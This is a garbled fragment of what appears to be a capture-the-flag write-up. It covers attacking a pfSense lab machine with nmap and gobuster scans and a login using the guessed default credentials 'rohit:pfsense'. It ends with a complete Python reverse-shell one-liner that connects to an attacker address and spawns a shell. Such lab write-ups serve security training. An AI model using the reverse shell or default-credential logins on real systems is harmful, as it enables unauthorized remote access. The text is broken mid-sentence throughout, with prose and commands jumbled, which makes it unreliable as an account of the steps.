nmapAutomator.sh -H 10.10.10.60 -t all
.txt
and .php
files, however, we find some more interesting files.gobuster dir -u https://10.10.10.60 -w /usr/share/dirb/wordlists/common.txt -x .txt,.php -k
changelog.txt
:/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
, we find another .txt
file.admin:pfsense
do not work. However, the system-users.txt
file above indicated that a Rohit
username exists, with a "company default" password.rohit:pfsense
, we successfully authenticate into the web application.export RHOST="10.10.14.23";export RPORT=4242;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'